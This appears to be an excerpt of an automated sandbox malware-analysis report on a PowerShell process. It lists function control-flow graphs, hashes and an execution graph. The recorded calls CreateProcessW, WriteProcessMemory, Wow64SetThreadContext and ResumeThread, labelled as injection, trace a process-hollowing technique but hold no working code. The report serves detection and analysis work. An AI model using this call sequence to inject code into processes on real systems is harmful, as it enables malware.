                                                                                Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.442663380.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 352d89f8800b5698093fc7c3db3946e404a78d540618a938f2136e0bf72d0af3
                                                                                • Instruction ID: 2065e26e4b682aa357ab7d29ad4b05027fdf65d098adc12d8fda7da5a39c43b7
                                                                                • Opcode Fuzzy Hash: 352d89f8800b5698093fc7c3db3946e404a78d540618a938f2136e0bf72d0af3
                                                                                • Instruction Fuzzy Hash: 5A01A771508340AEEB148A15DC84767BB98EF81764F1CC555FC490B192C3799945CAB1
                                                                                Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.442663380.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 13bc403d4af0bcb4328e59a91e24f0db057d9fa851cc6b89cd9cd2743ce10c3d
                                                                                • Instruction ID: 770ab500e1c2a6bca71f580bcdfd193d34b6b926d71ff6f889bbbfe9774f6561
                                                                                • Opcode Fuzzy Hash: 13bc403d4af0bcb4328e59a91e24f0db057d9fa851cc6b89cd9cd2743ce10c3d
                                                                                • Instruction Fuzzy Hash: D7F0C271504340AFEB108A15DCC4B66FB98EB41734F18C15AEC480F292C3799C45CAB1

                                                                                Execution Graph

                                                                                Execution Coverage:11.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:58.7%
                                                                                Total number of Nodes:46
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 4159 294b40 4160 294b67 4159->4160 4163 294c90 4160->4163 4164 294cba 4163->4164 4165 294c7c 4164->4165 4168 294d48 4164->4168 4184 294d58 4164->4184 4169 294d58 4168->4169 4200 29172c 4169->4200 4171 294f54 4172 291738 Wow64SetThreadContext 4171->4172 4173 295053 4171->4173 4172->4173 4174 291774 WriteProcessMemory 4173->4174 4178 29537c 4174->4178 4175 29561b 4176 291774 WriteProcessMemory 4175->4176 4177 29566c 4176->4177 4179 291780 Wow64SetThreadContext 4177->4179 4181 29576f 4177->4181 4178->4175 4180 291774 WriteProcessMemory 4178->4180 4179->4181 4180->4178 4182 291798 ResumeThread 4181->4182 4183 295821 4182->4183 4183->4164 4185 294d8b 4184->4185 4186 29172c CreateProcessW 4185->4186 4187 294f54 4186->4187 4189 295053 4187->4189 4215 291738 4187->4215 4204 291774 4189->4204 4191 29561b 4192 291774 WriteProcessMemory 4191->4192 4193 29566c 4192->4193 4197 29576f 4193->4197 4208 291780 4193->4208 4194 29537c 4194->4191 4196 291774 WriteProcessMemory 4194->4196 4196->4194 4212 291798 4197->4212 4201 295930 CreateProcessW 4200->4201 4203 295b24 4201->4203 4205 295f98 WriteProcessMemory 4204->4205 4207 296078 4205->4207 4207->4194 4210 295c68 Wow64SetThreadContext 4208->4210 4211 295d24 4210->4211 4211->4197 4213 2960d8 ResumeThread 4212->4213 4214 295821 4213->4214 4214->4164 4216 295c68 Wow64SetThreadContext 4215->4216 4218 295d24 4216->4218 4218->4189

                                                                                Executed Functions

                                                                                Function 00294D58 Relevance: .7, Instructions: 658COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 256 294d58-294d89 257 294d8b 256->257 258 294d90-294ec6 256->258 257->258 263 294ec8 258->263 264 294ecd-294f02 258->264 263->264 266 294f2f-294f74 call 29172c 264->266 267 294f04-294f2e 264->267 271 294f9d-294fc3 266->271 272 294f76-294f92 266->272 267->266 275 294fca-29500c 271->275 276 294fc5 271->276 272->271 280 29500e 275->280 281 295013-29503f 275->281 276->275 280->281 283 295041-295073 call 291738 281->283 284 2950a0-2950d1 call 291744 281->284 291 29509c-29509e 283->291 292 295075-295091 283->292 289 2950fa-295104 284->289 290 2950d3-2950ef 284->290 293 29510b-29512e 289->293 294 295106 289->294 290->289 291->289 292->291 295 295130 293->295 296 295135-295179 call 291750 293->296 294->293 295->296 303 29517b-295197 296->303 304 2951a2-2951ab 296->304 303->304 305 2951ad-2951d5 call 29175c 304->305 306 2951d7-2951d9 304->306 309 2951df-2951f3 305->309 306->309 311 29521c-295226 309->311 312 2951f5-295211 309->312 313 295228 311->313 314 29522d-295251 311->314 312->311 313->314 319 295258-2952aa call 291768 314->319 320 295253 314->320 324 2952ac-2952c0 319->324 325 2952c2-2952c4 319->325 320->319 326 2952ca-2952de 324->326 325->326 327 29531b-295335 326->327 328 2952e0-29531a call 291768 326->328 330 29535e-29539c call 291774 327->330 331 295337-295353 327->331 328->327 336 29539e-2953ba 330->336 337 2953c5-2953cf 330->337 331->330 336->337 339 2953d1 337->339 340 2953d6-2953e6 337->340 339->340 342 2953e8 340->342 343 2953ed-295415 340->343 342->343 346 29541c-29542b 343->346 347 295417 343->347 348 2955f6-295615 346->348 347->346 349 29561b-295642 348->349 350 295430-29543e 348->350 354 295649-29568c call 291774 349->354 355 295644 349->355 351 295440 350->351 352 295445-29546c 350->352 351->352 358 29546e 352->358 359 295473-29549a 352->359 361 29568e-2956aa 354->361 362 2956b5-2956bf 354->362 355->354 358->359 364 29549c 359->364 365 2954a1-2954d5 359->365 361->362 366 2956c1 362->366 367 2956c6-2956f3 362->367 364->365 372 2954db-2954e9 365->372 373 2955c1-2955ce 365->373 366->367 374 295700-29570c 367->374 375 2956f5-2956ff 367->375 378 2954eb 372->378 379 2954f0-2954f7 372->379 376 2955d0 373->376 377 2955d5-2955e9 373->377 380 29570e 374->380 381 295713-295723 374->381 375->374 376->377 384 2955eb 377->384 385 2955f0 377->385 378->379 386 2954f9 379->386 387 2954fe-295546 379->387 380->381 382 29572a-29575b 381->382 383 295725 381->383 390 29575d-29576a call 291780 382->390 391 2957bc-2957ed call 29178c 382->391 383->382 384->385 385->348 386->387 395 295548 387->395 396 29554d-295572 call 291774 387->396 397 29576f-29578f 390->397 402 2957ef-29580b 391->402 403 295816-29581c call 291798 391->403 395->396 405 295577-295597 396->405 400 2957b8-2957ba 397->400 401 295791-2957ad 397->401 400->403 401->400 402->403 406 295821-295841 403->406 407 295599-2955b5 405->407 408 2955c0 405->408 411 29586a-29590d 406->411 412 295843-29585f 406->412 407->408 408->373 412->411
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ContextMemoryProcessThreadWow64Write
                                                                                • String ID:
                                                                                • API String ID: 3696009080-0
                                                                                • Opcode ID: 8c4a549d8bf4df82b3c7b68d271f2e55394189219032023c3a00b164edf2e431
                                                                                • Instruction ID: d403d54b2d97102eec42af4729b65173c2202ade966b4a2569ecf70904c1f01e
                                                                                • Opcode Fuzzy Hash: 8c4a549d8bf4df82b3c7b68d271f2e55394189219032023c3a00b164edf2e431
                                                                                • Instruction Fuzzy Hash: FB62ED74E112298FEB65DF65C894BEDBBB2BB89300F5081EAD40DA7291DB305E85CF50
                                                                                Function 00294D48 Relevance: .5, Instructions: 522COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 422 294d48-294d89 424 294d8b 422->424 425 294d90-294ec6 422->425 424->425 430 294ec8 425->430 431 294ecd-294f02 425->431 430->431 433 294f2f-294f74 call 29172c 431->433 434 294f04-294f2e 431->434 438 294f9d-294fc3 433->438 439 294f76-294f92 433->439 434->433 442 294fca-29500c 438->442 443 294fc5 438->443 439->438 447 29500e 442->447 448 295013-29503f 442->448 443->442 447->448 450 295041-295073 call 291738 448->450 451 2950a0-2950d1 call 291744 448->451 458 29509c-29509e 450->458 459 295075-295091 450->459 456 2950fa-295104 451->456 457 2950d3-2950ef 451->457 460 29510b-29512e 456->460 461 295106 456->461 457->456 458->456 459->458 462 295130 460->462 463 295135-295179 call 291750 460->463 461->460 462->463 470 29517b-295197 463->470 471 2951a2-2951ab 463->471 470->471 472 2951ad-2951d5 call 29175c 471->472 473 2951d7-2951d9 471->473 476 2951df-2951f3 472->476 473->476 478 29521c-295226 476->478 479 2951f5-295211 476->479 480 295228 478->480 481 29522d-295251 478->481 479->478 480->481 486 295258-2952aa call 291768 481->486 487 295253 481->487 491 2952ac-2952c0 486->491 492 2952c2-2952c4 486->492 487->486 493 2952ca-2952de 491->493 492->493 494 29531b-295335 493->494 495 2952e0-29531a call 291768 493->495 497 29535e-29539c call 291774 494->497 498 295337-295353 494->498 495->494 503 29539e-2953ba 497->503 504 2953c5-2953cf 497->504 498->497 503->504 506 2953d1 504->506 507 2953d6-2953e6 504->507 506->507 509 2953e8 507->509 510 2953ed-295415 507->510 509->510 513 29541c-29542b 510->513 514 295417 510->514 515 2955f6-295615 513->515 514->513 516 29561b-295642 515->516 517 295430-29543e 515->517 521 295649-29568c call 291774 516->521 522 295644 516->522 518 295440 517->518 519 295445-29546c 517->519 518->519 525 29546e 519->525 526 295473-29549a 519->526 528 29568e-2956aa 521->528 529 2956b5-2956bf 521->529 522->521 525->526 531 29549c 526->531 532 2954a1-2954d5 526->532 528->529 533 2956c1 529->533 534 2956c6-2956f3 529->534 531->532 539 2954db-2954e9 532->539 540 2955c1-2955ce 532->540 533->534 541 295700-29570c 534->541 542 2956f5-2956ff 534->542 545 2954eb 539->545 546 2954f0-2954f7 539->546 543 2955d0 540->543 544 2955d5-2955e9 540->544 547 29570e 541->547 548 295713-295723 541->548 542->541 543->544 551 2955eb 544->551 552 2955f0 544->552 545->546 553 2954f9 546->553 554 2954fe-295546 546->554 547->548 549 29572a-29575b 548->549 550 295725 548->550 557 29575d-29576a call 291780 549->557 558 2957bc-2957ed call 29178c 549->558 550->549 551->552 552->515 553->554 562 295548 554->562 563 29554d-295572 call 291774 554->563 564 29576f-29578f 557->564 569 2957ef-29580b 558->569 570 295816-29581c call 291798 558->570 562->563 572 295577-295597 563->572 567 2957b8-2957ba 564->567 568 295791-2957ad 564->568 567->570 568->567 569->570 573 295821-295841 570->573 574 295599-2955b5 572->574 575 2955c0 572->575 578 29586a-29590d 573->578 579 295843-29585f 573->579 574->575 575->540 579->578
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a7910e761eba46100cf91860e4aa723d0cb339f5f8cb3e1ddecac8683053442d
                                                                                • Instruction ID: 5b518f809e3895a87446dfd4316142f44200c7c8fa4e088a5e875865358483a2
                                                                                • Opcode Fuzzy Hash: a7910e761eba46100cf91860e4aa723d0cb339f5f8cb3e1ddecac8683053442d
                                                                                • Instruction Fuzzy Hash: 5932EF74E112298FEB65DF65C894BEDBBB2BB89300F5081EAD50DA7291DB305E85CF40
                                                                                Function 0072203C Relevance: 6.3, Strings: 4, Instructions: 1321COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 72203c-72203f 1 722041-722043 0->1 2 722045-72204d 0->2 1->2 3 722065-722069 2->3 4 72204f-722054 2->4 7 722194-72219e 3->7 8 72206f-722073 3->8 5 722055 4->5 6 722059-722063 4->6 5->6 9 722057 5->9 6->3 10 7221a0-7221a9 7->10 11 7221ac-7221b2 7->11 12 7220b3 8->12 13 722075-722086 8->13 9->3 16 7221b4-7221b6 11->16 17 7221b8-7221c4 11->17 14 7220b5-7220b7 12->14 22 7221ec-72223b 13->22 23 72208c-722091 13->23 14->7 18 7220bd-7220c1 14->18 20 7221c6-7221e9 16->20 17->20 18->7 21 7220c7-7220cb 18->21 21->7 26 7220d1-7220f7 21->26 33 722241-722246 22->33 34 72243e-72244d 22->34 27 722093-722099 23->27 28 7220a9-7220b1 23->28 26->7 49 7220fd-722101 26->49 30 72209b 27->30 31 72209d-7220a7 27->31 28->14 30->28 31->28 37 722248-72224e 33->37 38 72225e-722262 33->38 39 722252-72225c 37->39 40 722250 37->40 42 7223e7-7223f1 38->42 43 722268-72226a 38->43 39->38 40->38 47 7223f3-7223fa 42->47 48 7223fd-722403 42->48 45 72227a 43->45 46 72226c-722278 43->46 50 72227c-72227e 45->50 46->50 51 722405-722407 48->51 52 722409-722415 48->52 54 722103-72210c 49->54 55 722124 49->55 50->42 56 722284-7222a3 50->56 57 722417-72243b 51->57 52->57 59 722113-722120 54->59 60 72210e-722111 54->60 58 722127-722134 55->58 70 7222b3 56->70 71 7222a5-7222b1 56->71 65 72213a-722191 58->65 61 722122 59->61 60->61 61->58 72 7222b5-7222b7 70->72 71->72 72->42 73 7222bd-7222c1 72->73 73->42 74 7222c7-7222cb 73->74 75 7222de 74->75 76 7222cd-7222dc 74->76 77 7222e0-7222e2 75->77 76->77 77->42 78 7222e8-7222ec 77->78 78->42 79 7222f2-722311 78->79 82 722313-722319 79->82 83 722329-722334 79->83 84 72231b 82->84 85 72231d-72231f 82->85 86 722343-72235f 83->86 87 722336-722339 83->87 84->83 85->83 88 722361-722374 86->88 89 72237c-722386 86->89 87->86 88->89 90 72238a-7223d8 89->90 91 722388 89->91 92 7223dd-7223e4 90->92 91->92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438341230.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_720000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: L4#p$L4#p$L4#p$d=,
                                                                                • API String ID: 0-59673657
                                                                                • Opcode ID: ed5e6db054c13d3acf666e4b9f5925b35f2653c31069a321d542afc3c7da2d21
                                                                                • Instruction ID: 355b3921a76f70fff9aa361b29511017661df3fc77d22e4e75f18226dad1a0f1
                                                                                • Opcode Fuzzy Hash: ed5e6db054c13d3acf666e4b9f5925b35f2653c31069a321d542afc3c7da2d21
                                                                                • Instruction Fuzzy Hash: 38B11931700268EFDF259F24E844BBE77A1AF85310F14846AE5058B293CB79DD57CB51
                                                                                Function 00720BB5 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 99 720bb5-720bb8 100 720bba-720bbc 99->100 101 720bbe-720bc6 99->101 100->101 102 720bc8-720bce 101->102 103 720bde-720be2 101->103 106 720bd2-720bdc 102->106 107 720bd0 102->107 104 720d43-720d4d 103->104 105 720be8-720bec 103->105 108 720d5b-720d61 104->108 109 720d4f-720d58 104->109 110 720bee-720bfd 105->110 111 720bff 105->111 106->103 107->103 113 720d63-720d65 108->113 114 720d67-720d73 108->114 115 720c01-720c03 110->115 111->115 116 720d75-720d93 113->116 114->116 115->104 117 720c09-720c29 115->117 123 720c2b-720c46 117->123 124 720c48 117->124 125 720c4a-720c4c 123->125 124->125 125->104 126 720c52-720c54 125->126 128 720c56-720c62 126->128 129 720c64 126->129 131 720c66-720c68 128->131 129->131 131->104 132 720c6e-720c8e 131->132 135 720c90-720c96 132->135 136 720ca6-720caa 132->136 139 720c9a-720c9c 135->139 140 720c98 135->140 137 720cc4-720cc8 136->137 138 720cac-720cb2 136->138 143 720ccf-720cd1 137->143 141 720cb6-720cc2 138->141 142 720cb4 138->142 139->136 140->136 141->137 142->137 145 720cd3-720cd9 143->145 146 720ce9-720d40 143->146 147 720cdb 145->147 148 720cdd-720cdf 145->148 147->146 148->146
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438341230.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_720000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: l;,$l;,
                                                                                • API String ID: 0-3674293618
                                                                                • Opcode ID: 9504b3a014973e84509e3ef30e47aeac80b4db509e0d9f395a2d742101c0bee7
                                                                                • Instruction ID: e766eae8ebcd219a54e6c0b9dcb782ba6123cde251209bc08d2d27b3091782bf
                                                                                • Opcode Fuzzy Hash: 9504b3a014973e84509e3ef30e47aeac80b4db509e0d9f395a2d742101c0bee7
                                                                                • Instruction Fuzzy Hash: 7D411675B00221CFDF285A74B8146BAB3A2AFD0310B24857AC4598B293DE79DD91D7B2
                                                                                Function 0029172C Relevance: 1.7, APIs: 1, Instructions: 239processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 150 29172c-2959bb 152 2959bd-2959cf 150->152 153 2959d2-2959e0 150->153 152->153 154 2959e2-2959f4 153->154 155 2959f7-295a33 153->155 154->155 156 295a35-295a44 155->156 157 295a47-295b22 CreateProcessW 155->157 156->157 161 295b2b-295bf4 157->161 162 295b24-295b2a 157->162 171 295c2a-295c35 161->171 172 295bf6-295c1f 161->172 162->161 176 295c36 171->176 172->171 176->176
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00295B0F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 12bb9d16c1767d5d2f5b9e152ad4efcb86e3eceaa0800b2a6e68f575cac351b6
                                                                                • Instruction ID: b7d37d4e3ca90e37f3536d4be8405ce440c11c68076977398b6c6ba4672f66e7
                                                                                • Opcode Fuzzy Hash: 12bb9d16c1767d5d2f5b9e152ad4efcb86e3eceaa0800b2a6e68f575cac351b6
                                                                                • Instruction Fuzzy Hash: C581EF70D0022D9FDF25CFA4C844BEDBBB1AB49304F1090AAE508B7250DB709E99CF94
                                                                                Function 0029592E Relevance: 1.7, APIs: 1, Instructions: 237processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 177 29592e-2959bb 179 2959bd-2959cf 177->179 180 2959d2-2959e0 177->180 179->180 181 2959e2-2959f4 180->181 182 2959f7-295a33 180->182 181->182 183 295a35-295a44 182->183 184 295a47-295b22 CreateProcessW 182->184 183->184 188 295b2b-295bf4 184->188 189 295b24-295b2a 184->189 198 295c2a-295c35 188->198 199 295bf6-295c1f 188->199 189->188 203 295c36 198->203 199->198 203->203
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00295B0F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: bcd232620c48ee65e1de23426f903661727a1b617aa4b779a10154e61295d798
                                                                                • Instruction ID: fd5847e9009600049d579f85f229fef32a47dd2f8132a21dd00f0746c374fe1b
                                                                                • Opcode Fuzzy Hash: bcd232620c48ee65e1de23426f903661727a1b617aa4b779a10154e61295d798
                                                                                • Instruction Fuzzy Hash: 0E81DF70D0022D9FDF25CF65C844BEDBBB1AB49304F1090AAE548B7250DB709E99CF94
                                                                                Function 00291774 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 204 291774-295fff 206 296001-296013 204->206 207 296016-296076 WriteProcessMemory 204->207 206->207 208 296078-29607e 207->208 209 29607f-2960bd 207->209 208->209
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00296066
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: ee22c15ac88764d775ead4ec9a56aa33b11fbe53e8ba19f046a44746798eada5
                                                                                • Instruction ID: 0746218b651a042df81d5787bcd790dc2b09b7b30b7a2e4d2762eab7b1886a24
                                                                                • Opcode Fuzzy Hash: ee22c15ac88764d775ead4ec9a56aa33b11fbe53e8ba19f046a44746798eada5
                                                                                • Instruction Fuzzy Hash: 59419AB5D102589FCF10CFA9D984ADEFBF1BB49310F24902AE818B7210D375AA55CF64
                                                                                Function 00295F91 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 212 295f91-295fff 214 296001-296013 212->214 215 296016-296076 WriteProcessMemory 212->215 214->215 216 296078-29607e 215->216 217 29607f-2960bd 215->217 216->217
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00296066
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 94b30659f9ed92a9f8a6717edc9d9b1b2715080091f186da82a8d5a3997ad560
                                                                                • Instruction ID: 853b89f3b014b9f50c9094d7534e4da273b4a53336b77da46d36a44775717ff7
                                                                                • Opcode Fuzzy Hash: 94b30659f9ed92a9f8a6717edc9d9b1b2715080091f186da82a8d5a3997ad560
                                                                                • Instruction Fuzzy Hash: 254198B5D002589FCF10CFA9D984ADEFBF1BB49310F24902AE818B7210D375AA55CF64
                                                                                Function 00291738 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 220 291738-295cc4 222 295cdb-295d22 Wow64SetThreadContext 220->222 223 295cc6-295cd8 220->223 224 295d2b-295d63 222->224 225 295d24-295d2a 222->225 223->222 225->224
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00295D12
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 93b9883901e9ba5b63876db6c815ebab0fefe4549f868838fa1d06ee58de84b1
                                                                                • Instruction ID: 256fae047d19e0a82b5a473744744f4348bb3653e5476071f9190a0fa579e73a
                                                                                • Opcode Fuzzy Hash: 93b9883901e9ba5b63876db6c815ebab0fefe4549f868838fa1d06ee58de84b1
                                                                                • Instruction Fuzzy Hash: F731ABB5D112589FCF10CFA9D984ADEFBF1AB49314F24802AE418B7350D378AA45CF64
                                                                                Function 00291780 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 228 291780-295cc4 230 295cdb-295d22 Wow64SetThreadContext 228->230 231 295cc6-295cd8 228->231 232 295d2b-295d63 230->232 233 295d24-295d2a 230->233 231->230 233->232
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00295D12
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: f988ffe22d283ac467747d6cb43678ee1bbab43e04698e04b5193facb691d650
                                                                                • Instruction ID: 4aae0b1f626be14c8f521f09b03b4944f90f2236f36b591b6462651197a7148b
                                                                                • Opcode Fuzzy Hash: f988ffe22d283ac467747d6cb43678ee1bbab43e04698e04b5193facb691d650
                                                                                • Instruction Fuzzy Hash: 8231ABB5D112589FCF10CFA9D984AEEFBF1AB49314F24802AE418B7350D378AA45CF64
                                                                                Function 00295C66 Relevance: 1.6, APIs: 1, Instructions: 89threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 236 295c66-295cc4 238 295cdb-295d22 Wow64SetThreadContext 236->238 239 295cc6-295cd8 236->239 240 295d2b-295d63 238->240 241 295d24-295d2a 238->241 239->238 241->240
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00295D12
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: b1705570c383497ce366d149b4bd64d60523709d4b0446754602d86d6e7d06c3
                                                                                • Instruction ID: 2d4e9b0334672429cf54b93172583e5532870ae8b646eabf04eec3a83e6d9ab5
                                                                                • Opcode Fuzzy Hash: b1705570c383497ce366d149b4bd64d60523709d4b0446754602d86d6e7d06c3
                                                                                • Instruction Fuzzy Hash: 4B3198B5D112589FDF10CFAAD984ADEFBF1AB49314F24802AE418B7350D378AA45CF64
                                                                                Function 002960D0 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 244 2960d0-29615e ResumeThread 246 296160-296166 244->246 247 296167-296195 244->247 246->247
                                                                                APIs
                                                                                • ResumeThread.KERNELBASE(?), ref: 0029614E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: a8e6357a56b3c22bceafac383e55691c9030f93733e68bfaf5b164bdf56ccb25
                                                                                • Instruction ID: e25746232a3eff7f43d28b42ee0c71da07f319b33956ccc96e22c0c433b57b08
                                                                                • Opcode Fuzzy Hash: a8e6357a56b3c22bceafac383e55691c9030f93733e68bfaf5b164bdf56ccb25
                                                                                • Instruction Fuzzy Hash: FE21ACB5D042099FCF10CFA9D984ADEFBF4AB49314F24945AE818B7310D374A945CFA5
                                                                                Function 00291798 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 250 291798-29615e ResumeThread 252 296160-296166 250->252 253 296167-296195 250->253 252->253
                                                                                APIs
                                                                                • ResumeThread.KERNELBASE(?), ref: 0029614E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 0d3b9f05fb12e7e4f3c64eb718d153b75cda5430743942b6d08b770839105071
                                                                                • Instruction ID: 9ee0a1cc9127ba2ace1b8ca101828923eaf07bb546e6463c07d0c18cf3356749
                                                                                • Opcode Fuzzy Hash: 0d3b9f05fb12e7e4f3c64eb718d153b75cda5430743942b6d08b770839105071
                                                                                • Instruction Fuzzy Hash: D521ACB4D102089FCF10CFA9D884ADEFBF4AB49314F20901AE819B7310D374A945CFA4
